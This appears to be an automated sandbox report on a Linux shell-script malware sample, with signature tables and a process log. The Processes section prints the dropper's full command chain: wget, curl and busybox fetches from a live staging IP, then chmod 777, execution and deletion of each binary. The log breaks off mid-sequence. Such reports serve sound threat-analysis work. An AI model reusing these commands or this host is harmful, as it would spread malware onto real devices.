Malware Analysis Report

2024-12-07 16:40

Sample ID 241114-byxwxs1rgs
Target a14f6217427019a86c4d002cef1e30a2.bin
SHA256 9c20942d674c25dfd8b64629ccdce039560dd91bb6820d8896b1483d1564e21d
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

9c20942d674c25dfd8b64629ccdce039560dd91bb6820d8896b1483d1564e21d

Threat Level: Shows suspicious behavior

The file a14f6217427019a86c4d002cef1e30a2.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-14 01:33

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-14 01:33

Reported

2024-11-14 01:36

Platform

debian9-mipsbe-20240611-en

Max time kernel

85s

Max time network

88s

Command Line

[/tmp/4aa5ab11bd6f613478208b74ffefcd67594912de8b15bc52edf572a0367d01e0.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR N/A
N/A /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 N/A
N/A /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 N/A
N/A /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY N/A
N/A /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W N/A
N/A /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 N/A
N/A /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv N/A
N/A /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa N/A
N/A /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW N/A
N/A /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE N/A
N/A /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD N/A
N/A /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 N/A
N/A /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj N/A
N/A /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs N/A
N/A /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv N/A
N/A /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa N/A
N/A /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW N/A
N/A /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj N/A
N/A /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs N/A
N/A /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE N/A
N/A /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD N/A
N/A /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 N/A
N/A /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR N/A
N/A /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 N/A
N/A /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 N/A
N/A /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY N/A
N/A /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W N/A
N/A /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW /usr/bin/curl N/A
File opened for modification /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 /usr/bin/curl N/A
File opened for modification /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY /usr/bin/curl N/A
File opened for modification /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR /usr/bin/curl N/A
File opened for modification /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY /usr/bin/curl N/A
File opened for modification /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD /usr/bin/curl N/A
File opened for modification /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR /usr/bin/curl N/A
File opened for modification /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 /usr/bin/curl N/A
File opened for modification /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W /usr/bin/curl N/A
File opened for modification /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 /usr/bin/curl N/A
File opened for modification /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE /usr/bin/curl N/A
File opened for modification /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW /usr/bin/curl N/A
File opened for modification /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 /usr/bin/curl N/A
File opened for modification /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 /usr/bin/curl N/A
File opened for modification /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv /usr/bin/curl N/A
File opened for modification /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 /usr/bin/curl N/A
File opened for modification /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs /usr/bin/curl N/A
File opened for modification /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj /usr/bin/curl N/A
File opened for modification /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs /usr/bin/curl N/A
File opened for modification /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv /usr/bin/curl N/A
File opened for modification /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE /usr/bin/curl N/A
File opened for modification /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 /usr/bin/curl N/A
File opened for modification /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa /usr/bin/curl N/A
File opened for modification /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj /usr/bin/curl N/A
File opened for modification /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W /usr/bin/curl N/A
File opened for modification /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD /usr/bin/curl N/A
File opened for modification /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 /usr/bin/curl N/A
File opened for modification /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa /usr/bin/curl N/A

Processes

/tmp/4aa5ab11bd6f613478208b74ffefcd67594912de8b15bc52edf572a0367d01e0.sh

[/tmp/4aa5ab11bd6f613478208b74ffefcd67594912de8b15bc52edf572a0367d01e0.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/bin/chmod

[chmod 777 C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR

[./C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/bin/rm

[rm C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/usr/bin/wget

[wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/bin/chmod

[chmod 777 jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4

[./jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/bin/rm

[rm jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/usr/bin/wget

[wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/bin/chmod

[chmod 777 No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5

[./No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/bin/rm

[rm No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/usr/bin/wget

[wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/bin/chmod

[chmod 777 nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY

[./nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/bin/rm

[rm nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/usr/bin/wget

[wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/bin/chmod

[chmod 777 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W

[./7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/bin/rm

[rm 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/usr/bin/wget

[wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/bin/chmod

[chmod 777 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1

[./6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/bin/rm

[rm 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/usr/bin/wget

[wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/bin/chmod

[chmod 777 pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv

[./pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/bin/rm

[rm pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/usr/bin/wget

[wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/bin/chmod

[chmod 777 IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa

[./IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/bin/rm

[rm IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/usr/bin/wget

[wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/bin/chmod

[chmod 777 L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW

[./L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/bin/rm

[rm L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/usr/bin/wget

[wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/bin/chmod

[chmod 777 gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE

[./gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/bin/rm

[rm gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/usr/bin/wget

[wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/bin/chmod

[chmod 777 Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD

[./Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/bin/rm

[rm Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/usr/bin/wget

[wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/bin/chmod

[chmod 777 eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65

[./eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/bin/rm

[rm eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/usr/bin/wget

[wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/bin/chmod

[chmod 777 FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj

[./FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/bin/rm

[rm FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/usr/bin/wget

[wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/bin/chmod

[chmod 777 MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs

[./MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/bin/rm

[rm MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/usr/bin/wget

[wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/bin/chmod

[chmod 777 pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv

[./pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/bin/rm

[rm pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/usr/bin/wget

[wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/bin/chmod

[chmod 777 IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa

[./IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/bin/rm

[rm IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/usr/bin/wget

[wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/bin/chmod

[chmod 777 L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW

[./L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/bin/rm

[rm L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/usr/bin/wget

[wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/bin/chmod

[chmod 777 FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj

[./FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/bin/rm

[rm FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/usr/bin/wget

[wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/bin/chmod

[chmod 777 MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs

[./MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/bin/rm

[rm MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/usr/bin/wget

[wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/bin/chmod

[chmod 777 gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE

[./gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/bin/rm

[rm gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/usr/bin/wget

[wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/bin/chmod

[chmod 777 Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD

[./Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/bin/rm

[rm Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/usr/bin/wget

[wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/bin/chmod

[chmod 777 eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65

[./eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/bin/rm

[rm eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/usr/bin/wget

[wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/bin/chmod

[chmod 777 C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR

[./C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/bin/rm

[rm C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/usr/bin/wget

[wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/bin/chmod

[chmod 777 jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4

